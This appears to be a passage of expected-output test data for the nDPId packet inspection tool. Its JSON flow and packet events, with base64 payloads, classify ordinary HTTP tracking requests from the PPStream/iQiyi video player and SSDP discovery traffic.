+01644{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1108,"source":"pps.pcap","alias":"nDPId-test","flow_id":66,"flow_packet_id":1,"flow_last_seen":1467353165300,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":946,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":946,"pkt_l4_len":912,"thread_ts_msec":1467353165300,"pkt":"TF4M6gNlABxCjnAxCABFAAOkGfJAAIAG0FjAqHMIymwO7MU\/AFBSz4AccUHHfVAYQTf+XQAAR0VUIC9jcDIuZ2lmP2E9NGUzYWU0MTVhNTg0NzQ4YWM5YWEzMTYyOGYzOWQxZTgmYWk9JmFzPTE6MjM6MjN8NDUmYXY9NC4xMC4wMDQmYj0xODA5MzIzMDEmYz0zMSZjdD01MDAwMDAwOTI3NTU4JmQ9MjE3NSZkaT0mZHA9NzEwMDAwMDEmZT1jNDg4OWU2NGFkOWQ5ZWViOWZmNDM4OTEwODUwYzQ0MiZlYz0mZW09JmZpPSZnPTAmbD1NVEU0TGpFMk15NDRMamt3Jm1rPSZudz0mb2Q9NTAwMDAwMDg1ODg3NCZvaT0mcD1hJnBwPSZyYz0mcmQ9JnJpPSZzPTE0NjczNTMxNjUwNDcmc2g9JnNxPSZzdz0mdD1zcCZ1PTBfYWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4mdj00Nzk1MzEwMDAmdnY9NS4yLjE1LjIyNDAmeD0meT1xY18xMDAwMDFfMTAwMTQwIEhUVFAvMS4xDQpBY2NlcHQtTGFuZ3VhZ2U6IHpoLUNODQpSZWZlcmVyOiBodHRwOi8vd3d3LmlxaXlpLmNvbS9jb21tb24vZmxhc2hwbGF5ZXIvMjAxNDA5MjQvTWFpblBsYXllcl81XzJfM19jM18yXzFfNi5zd2YNCnF5aWQ6IGFhb2VmZHRxZ2ZkZXB4YzJ0bnYzcGl1Y2djYjRlb2ZuDQpxeXBpZDogXzIwMTINCnF5cGxhdGZvcm06IDAtMg0KeC1mbGFzaC12ZXJzaW9uOiAxMiwwLDAsNzANCkFjY2VwdDogKi8qDQpQcmFnbWE6IG5vLWNhY2hlDQpDYWNoZS1Db250cm9sOiBuby1jYWNoZQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS80LjAgKGNvbXBhdGlibGU7IE1TSUUgOC4wOyBXaW5kb3dzIE5UIDYuMTsgV09XNjQ7IFRyaWRlbnQvNC4wOyBTTENDMjsgLk5FVCBDTFIgMi4wLjUwNzI3OyAuTkVUIENMUiAzLjUuMzA3Mjk7IC5ORVQgQ0xSIDMuMC4zMDcyOTsgTWVkaWEgQ2VudGVyIFBDIDYuMCkvUVktUGxheWVyLVdpbmRvd3MvMi4wLjEwMg0KSG9zdDogbXNnLjcxLmFtDQoNCg=="} 
+01296{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1108,"source":"pps.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353165300,"flow_last_seen":1467353165300,"flow_idle_time":7560000,"flow_min_l4_payload_len":892,"flow_max_l4_payload_len":892,"flow_tot_l4_payload_len":892,"flow_avg_l4_payload_len":892,"midstream":1,"thread_ts_msec":1467353165300,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50495,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.71.am","url":"msg.71.am\/cp2.gif?a=4e3ae415a584748ac9aa31628f39d1e8&ai=&as=1:23:23|45&av=4.10.004&b=180932301&c=31&ct=5000000927558&d=2175&di=&dp=71000001&e=c4889e64ad9d9eeb9ff438910850c442&ec=&em=&fi=&g=0&l=MTE4LjE2My44Ljkw&mk=&nw=&od=5000000858874&oi=&p=a&pp=&rc=&rd=&ri=&s=1467353165047&sh=&sq=&sw=&t=sp&u=0_aaoefdtqgfdepxc2tnv3piucgcb4eofn&v=479531000&vv=5.2.15.2240&x=&y=qc_100001_100140","code":0,"content_type":"","user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)\/QY-Player-Windows\/2.0.102"}} +00647{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1109,"source":"pps.pcap","alias":"nDPId-test","flow_id":66,"flow_packet_id":2,"flow_last_seen":1467353165410,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1467353165410,"pkt":"ABxCjnAxTF4M6gNlCABFAAC5NehAADMGBE7KbA7swKhzCABQxT9xQcd9Us+DmFAYACAMewAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuOC4wDQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA2OjA0IEdNVA0KQ29udGVudC1UeXBlOiBpbWFnZS9naWYNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg=="} 
+00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1110,"source":"pps.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353165456,"flow_last_seen":1467353165456,"flow_idle_time":7560000,"flow_min_l4_payload_len":1260,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":1260,"flow_avg_l4_payload_len":1260,"midstream":1,"thread_ts_msec":1467353165456,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"101.227.200.11","src_port":50496,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +02137{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1110,"source":"pps.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":1,"flow_last_seen":1467353165456,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1314,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1314,"pkt_l4_len":1280,"thread_ts_msec":1467353165456,"pkt":"TF4M6gNlABxCjnAxCABFAAUUGh1AAIAGeifAqHMIZePIC8VAAFBgEsEemWlGj1AQ\/\/DZSAAAR0VUIC90cmFjazI\/YT0wJmFzPTE7MiwzOzQsNSZiPTE0NjczNTMxNjUmYz05NjY1NDJjODJhNTY5NGQwZTk0M2Q1MGQ1ZmNmNWE1NSZjdj01LjIuMTUuMjI0MCZkPTUwMDAwMDA4NTQ5MzQmZHI9MjE3NSZmPTRlM2FlNDE1YTU4NDc0OGFjOWFhMzE2MjhmMzlkMWU4Jmc9MF9hYW9lZmR0cWdmZGVweGMydG52M3BpdWNnY2I0ZW9mbiZoPSZpPXFjXzEwMDAwMV8xMDAxNDAmaXY9MCZqPTMxJms9MTgwOTMyMzAxJmtwPTRlM2FlNDE1YTU4NDc0OGFjOWFhMzE2MjhmMzlkMWU4Jm49NDc5NTMxMDAwJm89MSZwPTEwMDAwMDAwMDAzODEmcT01MDAwMDAwOTIzNDQ3JnI9YzQ4ODllNjRhZDlkOWVlYjlmZjQzODkxMDg1MGM0NDImcnQ9MTQ2NzM1MzExMyZzPThlZGI2OTRjOGM4Y2NhOTIzZDNlYWU2NjIyZjlhZWU2JnN2PTQuMTAuMDA0JnU9MSZ1cD0mdj01MDAwMDAwODU0ODU4JnZlPTEmdz00LDUgSFRUUC8xLjENCkFjY2VwdC1MYW5ndWFnZTogemgtQ04NClJlZmVyZXI6IGh0dHA6Ly93d3cuaXFpeWkuY29tL2NvbW1vbi9mbGFzaHBsYXllci8yMDE0MDkyNC9NYWluUGxheWVyXzVfMl8zX2MzXzJfMV82LnN3Zg0KcXlpZDogYWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4NCnF5cGlkOiBfMjAxMg0KcXlwbGF0Zm9ybTogMC0yDQp4LWZsYXNoLXZlcnNpb246IDEyLDAsMCw3MA0KQWNjZXB0OiAqLyoNClByYWdtYTogbm8tY2FjaGUNCkNhY2hlLUNvbn
Ryb2w6IG5vLWNhY2hlDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzQuMCAoY29tcGF0aWJsZTsgTVNJRSA4LjA7IFdpbmRvd3MgTlQgNi4xOyBXT1c2NDsgVHJpZGVudC80LjA7IFNMQ0MyOyAuTkVUIENMUiAyLjAuNTA3Mjc7IC5ORVQgQ0xSIDMuNS4zMDcyOTsgLk5FVCBDTFIgMy4wLjMwNzI5OyBNZWRpYSBDZW50ZXIgUEMgNi4wKS9RWS1QbGF5ZXItV2luZG93cy8yLjAuMTAyDQpIb3N0OiBhcGkuY3VwaWQuaXFpeWkuY29tDQpDb29raWU6IHBwc19jbGllbnRfdmVyMj01LjIuMTUuMjI0MDsgVDAwNDA0PTRlM2FlNDE1YTU4NDc0OGFjOWFhMzE2MjhmMzlkMWU4OyBfcHBzX2l2aT1WazQ5TVRZd05UQTFMYVcvcFBtaFJ6OC9QNlRhcEVlbXVEOC9wTSt3Wmo4dHBMV3gzemd3cGxvL3BHYW9jU1pXVUQweEpsWkRQVDgvUHo4K3BMV3gzemd3cGxvL3BHYW9jU1pXU2owdE1TWldVejFXSmxaRVBTWldWRnRCWFQweU1UYzFKbFpOUFNaV1ZqMDFMakl1TVRVdU1qSTBNQ1pXVlQxb2RIUndPaTh2ZDNkM0xtbHhhWGxwTG1OdmJTOTJYekU1Y25K"} +01396{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1110,"source":"pps.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353165456,"flow_last_seen":1467353165456,"flow_idle_time":7560000,"flow_min_l4_payload_len":1260,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":1260,"flow_avg_l4_payload_len":1260,"midstream":1,"thread_ts_msec":1467353165456,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"101.227.200.11","src_port":50496,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"},"http": {"hostname":"api.cupid.iqiyi.com","url":"api.cupid.iqiyi.com\/track2?a=0&as=1;2,3;4,5&b=1467353165&c=966542c82a5694d0e943d50d5fcf5a55&cv=5.2.15.2240&d=5000000854934&dr=2175&f=4e3ae415a584748ac9aa31628f39d1e8&g=0_aaoefdtqgfdepxc2tnv3piucgcb4eofn&h=&i=qc_100001_100140&iv=0&j=31&k=180932301&kp=4e3ae415a584748ac9aa31628f39d1e8&n=479531000&o=1&p=1000000000381&q=5000000923447&r=c4889e64ad9d9eeb9ff438910850c442&rt=1467353113&s=8edb694c8c8cca923d3eae6622f9aee6&sv=4.10.004&u=1&up=&v=5000000854858&ve=1&w=4,5","code":0,"content_type":"","user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; 
WOW64; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)\/QY-Player-Windows\/2.0.102"}} +00705{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1111,"source":"pps.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":2,"flow_last_seen":1467353165456,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":241,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":241,"pkt_l4_len":207,"thread_ts_msec":1467353165456,"pkt":"TF4M6gNlABxCjnAxCABFAADjGh5AAIAGflfAqHMIZePIC8VAAFBgEsYKmWlGj1AY\/\/BFbwAAc2RuVjRiR2N1YUhSdGJBPT07IFFDMDA2PXU1NDl2cHoxMGw5ZmthdHVtNGFsdzRicDsgUUMwMDg9MTQ2NjY0NTgxNi4xNDY2NjQ1ODE2LjE0NjY2NDU4MTYuMTsgSG1fbHZ0XzUzYjczNzRhNjNjMzc0ODNlNWRkOTdkNzhkOWJiMzZlPTE0NjY2NDU4MTc7IFFDMDA1PWFhb2VmZHRxZ2ZkZXB4YzJ0bnYzcGl1Y2djYjRlb2ZuDQoNCg=="} +00788{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1112,"source":"pps.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":3,"flow_last_seen":1467353165492,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":306,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":306,"pkt_l4_len":272,"thread_ts_msec":1467353165492,"pkt":"ABxCjnAxTF4M6gNlCABFAAEkdU5AAC8Gc+Zl48gLwKhzCABQxUCZaUaPYBLGxVAYP\/ygXgAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuOC4wDQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA2OjA1IEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L2h0bWw7IGNoYXJzZXQ9dXRmLTgNCkNvbnRlbnQtTGVuZ3RoOiAyDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpDYWNoZS1Db250cm9sOiBuby1jYWNoZQ0KQWNjZXNzLUNvbnRyb2wtQWxsb3ctQ3JlZGVudGlhbHM6IHRydWUNCkNhY2hlLUNvbnRyb2w6IG5vLWNhY2hlDQoNCm9r"} 
+00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1113,"source":"pps.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353165563,"flow_last_seen":1467353165563,"flow_idle_time":7560000,"flow_min_l4_payload_len":950,"flow_max_l4_payload_len":950,"flow_tot_l4_payload_len":950,"flow_avg_l4_payload_len":950,"midstream":1,"thread_ts_msec":1467353165563,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"123.125.112.49","src_port":50497,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +01721{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1113,"source":"pps.pcap","alias":"nDPId-test","flow_id":68,"flow_packet_id":1,"flow_last_seen":1467353165563,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1004,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1004,"pkt_l4_len":970,"thread_ts_msec":1467353165563,"pkt":"TF4M6gNlABxCjnAxCABFAAPeGjdAAIAGvYPAqHMIe31wMcVBAFAj7VXd5qVx9VAYQTcqlQAAR0VUIC9ta3QuZ2lmP2FpPTg0NTI4OTE5MDBjOTAzYWU3YTg3NjQ0NzkyM2E1YWVjJmV0PTAgSFRUUC8xLjENCkFjY2VwdC1MYW5ndWFnZTogemgtQ04NClJlZmVyZXI6IGh0dHA6Ly93d3cuaXFpeWkuY29tL2NvbW1vbi9mbGFzaHBsYXllci8yMDE0MDkyNC9NYWluUGxheWVyXzVfMl8zX2MzXzJfMV82LnN3Zg0KcXlpZDogYWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4NCnF5cGlkOiBfMjAxMg0KcXlwbGF0Zm9ybTogMC0yDQp4LWZsYXNoLXZlcnNpb246IDEyLDAsMCw3MA0KQWNjZXB0OiAqLyoNClByYWdtYTogbm8tY2FjaGUNCkNhY2hlLUNvbnRyb2w6IG5vLWNhY2hlDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzQuMCAoY29tcGF0aWJsZTsgTVNJRSA4LjA7IFdpbmRvd3MgTlQgNi4xOyBXT1c2NDsgVHJpZGVudC80LjA7IFNMQ0MyOyAuTkVUIENMUiAyLjAuNTA3Mjc7IC5ORVQgQ0xSIDMuNS4zMDcyOTsgLk5FVCBDTFIgMy4wLjMwNzI5OyBNZWRpYSBDZW50ZXIgUEMgNi4wKS9RWS1QbGF5ZXItV2luZG93cy8yLjAuMTAyDQpIb3N0OiBjbGljay5obS5iYWlkdS5jb20NCkNvb2tpZTogSE1BQ0NPVU5UPTg4Q0M2OUIwNEM5RDYyOUE7IEhfTUtUX0NMS0lEPTAwMDAwMDAxNTlkYTE2Yjg1Nzc2MDgzMjVhMDhhMzc2MDAwMDAwMjAzNTMzNjUzMjM1NjUzMzMzNjUzMDM2MzQ2MzM2MzUzNzYzMzAzNjYyMzUzNTM4Nj
UzNTYzMzM2MzMzMzM2NjY0MDAwMDAwMDg3OTZmNzU3NDc1MmU2MjY1OyBIX01LVF9DTEtMT0c9MDAwMDAwMDE1OWRhMTZiODU3NzYwODMyNWEwOGEzNzYwMDAwMDAyMDM1MzM2NTMyMzU2NTMzMzM2NTMwMzYzNDYzMzYzNTM3NjMzMDM2NjIzNTM1Mzg2NTM1NjMzMzYzMzMzMzY2NjQwMDAwMDAwODc5NmY3NTc0NzUyZTYyNjU7IEJBSURVSUQ9MjEwMkRDNzUxRUQwREYzNkUzRDZDRjZDMjEwRkFCNzk6Rkc9MQ0KDQo="} +00989{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1113,"source":"pps.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353165563,"flow_last_seen":1467353165563,"flow_idle_time":7560000,"flow_min_l4_payload_len":950,"flow_max_l4_payload_len":950,"flow_tot_l4_payload_len":950,"flow_avg_l4_payload_len":950,"midstream":1,"thread_ts_msec":1467353165563,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"123.125.112.49","src_port":50497,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"click.hm.baidu.com","url":"click.hm.baidu.com\/mkt.gif?ai=8452891900c903ae7a876447923a5aec&et=0","code":0,"content_type":"","user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)\/QY-Player-Windows\/2.0.102"}} 
+00703{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1114,"source":"pps.pcap","alias":"nDPId-test","flow_id":68,"flow_packet_id":2,"flow_last_seen":1467353165612,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":241,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":241,"pkt_l4_len":207,"thread_ts_msec":1467353165612,"pkt":"ABxCjnAxTF4M6gNlCABFAADj3khAAC0GT217fXAxwKhzCABQxUHmpXH1I+1Zk1AYAIIWkgAASFRUUC8xLjEgMjA0IE5vIENvbnRlbnQNCkNvbnRlbnQtVHlwZTogaW1hZ2UvZ2lmDQpDYWNoZS1Db250cm9sOiBwcml2YXRlLCBtYXgtYWdlPTAsIG5vLWNhY2hlDQpQcmFnbWE6IG5vLWNhY2hlDQpDb25uZWN0aW9uOiBjbG9zZQ0KRGF0ZTogRnJpLCAwMSBKdWwgMjAxNiAwNjowNjowNSBHTVQNClNlcnZlcjogYXBhY2hlDQoNCg=="} +01644{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1115,"source":"pps.pcap","alias":"nDPId-test","flow_id":66,"flow_packet_id":3,"flow_last_seen":1467353165616,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":946,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":946,"pkt_l4_len":912,"thread_ts_msec":1467353165616,"pkt":"TF4M6gNlABxCjnAxCABFAAOkGkVAAIAG0AXAqHMIymwO7MU\/AFBSz4OYcUHIDlAYQRL3fAAAR0VUIC9jcDIuZ2lmP2E9NGUzYWU0MTVhNTg0NzQ4YWM5YWEzMTYyOGYzOWQxZTgmYWk9JmFzPTE6NDU6MjN8NDUmYXY9NC4xMC4wMDQmYj0xODA5MzIzMDEmYz0zMSZjdD01MDAwMDAwOTIzNDQ3JmQ9MjE3NSZkaT0mZHA9NzEwMDAwMDEmZT1jNDg4OWU2NGFkOWQ5ZWViOWZmNDM4OTEwODUwYzQ0MiZlYz0mZW09JmZpPSZnPTAmbD1NVEU0TGpFMk15NDRMamt3Jm1rPSZudz0mb2Q9NTAwMDAwMDg1NDkzNCZvaT0mcD1hJnBwPSZyYz0mcmQ9JnJpPSZzPTE0NjczNTMxNjUwNDkmc2g9JnNxPSZzdz0mdD1zdCZ1PTBfYWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4mdj00Nzk1MzEwMDAmdnY9NS4yLjE1LjIyNDAmeD0meT1xY18xMDAwMDFfMTAwMTQwIEhUVFAvMS4xDQpBY2NlcHQtTGFuZ3VhZ2U6IHpoLUNODQpSZWZlcmVyOiBodHRwOi8vd3d3LmlxaXlpLmNvbS9jb21tb24vZmxhc2hwbGF5ZXIvMjAxNDA5MjQvTWFpblBsYXllcl81XzJfM19jM18yXzFfNi5zd2YNCnF5aWQ6IGFhb2VmZHRxZ2ZkZXB4YzJ0bnYzcGl1Y2djYjRlb2ZuDQpxeXBpZDogXzIwMTINCnF5cGxhdGZvcm06IDAtMg0KeC1mbGFzaC12ZXJzaW9uOiAxMiwwLDAsNzANCkFjY2VwdDogKi8qDQpQcmFnbWE6IG5vLWNhY2hlDQpD
YWNoZS1Db250cm9sOiBuby1jYWNoZQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS80LjAgKGNvbXBhdGlibGU7IE1TSUUgOC4wOyBXaW5kb3dzIE5UIDYuMTsgV09XNjQ7IFRyaWRlbnQvNC4wOyBTTENDMjsgLk5FVCBDTFIgMi4wLjUwNzI3OyAuTkVUIENMUiAzLjUuMzA3Mjk7IC5ORVQgQ0xSIDMuMC4zMDcyOTsgTWVkaWEgQ2VudGVyIFBDIDYuMCkvUVktUGxheWVyLVdpbmRvd3MvMi4wLjEwMg0KSG9zdDogbXNnLjcxLmFtDQoNCg=="} +00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1116,"source":"pps.pcap","alias":"nDPId-test","flow_id":68,"flow_packet_id":3,"flow_last_seen":1467353165659,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1467353165659,"pkt":"ABxCjnAxTF4M6gNlCABFAAAo3kpAAC0GUCZ7fXAxwKhzCABQxUHmpXKwI+1ZlFARAILziAAAAAAAAAAA"} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1120,"source":"pps.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353166729,"flow_last_seen":1467353166729,"flow_idle_time":180000,"flow_min_l4_payload_len":88,"flow_max_l4_payload_len":88,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":88,"midstream":0,"thread_ts_msec":1467353166729,"l3_proto":"ip4","src_ip":"192.168.5.63","dst_ip":"239.255.255.250","src_port":39383,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00559{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1120,"source":"pps.pcap","alias":"nDPId-test","flow_id":69,"flow_packet_id":1,"flow_last_seen":1467353166729,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":130,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":130,"pkt_l4_len":96,"thread_ts_msec":1467353166729,"pkt":"AQBef\/\/69AnYH69kCABFAAB0AABAAAERw5fAqAU\/7\/\/\/+pnXB2wAYBOHTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDoyMzkuMjU1LjI1NS4yNTA6MTkwMA0KTWFuOnNzZHA6ZGlzY292ZXINCnN0OnNzZHA6YWxsDQpNWDozDQoNCg=="} 
00639{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1120,"source":"pps.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353166729,"flow_last_seen":1467353166729,"flow_idle_time":180000,"flow_min_l4_payload_len":88,"flow_max_l4_payload_len":88,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":88,"midstream":0,"thread_ts_msec":1467353166729,"l3_proto":"ip4","src_ip":"192.168.5.63","dst_ip":"239.255.255.250","src_port":39383,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1121,"source":"pps.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353166729,"flow_last_seen":1467353166729,"flow_idle_time":180000,"flow_min_l4_payload_len":123,"flow_max_l4_payload_len":123,"flow_tot_l4_payload_len":123,"flow_avg_l4_payload_len":123,"midstream":0,"thread_ts_msec":1467353166729,"l3_proto":"ip4","src_ip":"192.168.5.63","dst_ip":"239.255.255.250","src_port":60976,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00604{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1121,"source":"pps.pcap","alias":"nDPId-test","flow_id":70,"flow_packet_id":1,"flow_last_seen":1467353166729,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":165,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":165,"pkt_l4_len":131,"thread_ts_msec":1467353166729,"pkt":"AQBef\/\/69AnYH69kCABFAACXAABAAAERw3TAqAU\/7\/\/\/+u4wB2wAg73KTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDoyMzkuMjU1LjI1NS4yNTA6MTkwMA0KTWFuOnNzZHA6ZGlzY292ZXINCnN0OnVybjpzY2hlbWFzLXVwbnAtb3JnOmRldmljZTpNZWRpYVJlbmRlcmVyOjENCk1YOjMNCg0K"} 
00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1121,"source":"pps.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353166729,"flow_last_seen":1467353166729,"flow_idle_time":180000,"flow_min_l4_payload_len":123,"flow_max_l4_payload_len":123,"flow_tot_l4_payload_len":123,"flow_avg_l4_payload_len":123,"midstream":0,"thread_ts_msec":1467353166729,"l3_proto":"ip4","src_ip":"192.168.5.63","dst_ip":"239.255.255.250","src_port":60976,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} -00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1122,"source":"pps.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353167288,"flow_last_seen":1467353167288,"flow_idle_time":7440000,"flow_min_l4_payload_len":640,"flow_max_l4_payload_len":640,"flow_tot_l4_payload_len":640,"flow_avg_l4_payload_len":640,"midstream":1,"thread_ts_msec":1467353167288,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"36.110.220.15","src_port":50498,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-01311{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1122,"source":"pps.pcap","alias":"nDPId-test","flow_id":71,"flow_packet_id":1,"flow_last_seen":1467353167288,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":694,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":694,"pkt_l4_len":660,"thread_ts_msec":1467353167288,"pkt":"TF4M6gNlABxCjnAxCABFAAKoG9BAAIAGqFHAqHMIJG7cD8VCAFB9qW\/gOgaPJFAY\/\/DRFwAAR0VUIC90bXBzdGF0cy5naWY\/dHlwZT1yZWNjdHBsYXkyMDEyMTIyNiZ1c3JhY3Q9c2hvdyZwcHVpZD0tMSZ1aWQ9YWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4mZXZlbnRfaWQ9NGIwODY4OTIwYjBmODI4NTMyMGE5ZTAwZWUwMzY5ZTUmY2lkPTMxJmJrdD1wcHNfY196ZWJyYV9tYWluX2RlZmF1bHQmYXJlYT1wcHNfY196ZWJyYSZwbGF0Zm9ybT0yMDEyJmFsYnVtbGlzdD00NzA2OTQ1MDAsNDcxNTkxMzAwLDQ2NTY0MTAwMCw0NzI4ODcxMDAsNDcxNzg4MTAwLDQ3Mzc0NjMwMCw0NzE5NDgzMDAsNDczNjk0NjAwLDQ3MjE4OTUwMCZhaWQ9NDc5NTMxMDAwJnNvdXJjZT0wLDEsMSwxLDEsMSwxLDEsMSZfPTE0NjczNTMxNjcwODcgSFRUUC8xLjENCkFjY2VwdDogKi8qDQpSZWZlcmVyOiBodHRwOi8vdm9kZ3VpZGUucHBzLmlxaXlpLmNvbS9wYWdlLnBocD92ZXJzaW9uPTUuMi4xNS4yMjQwDQpBY2NlcHQtTGFuZ3VhZ2U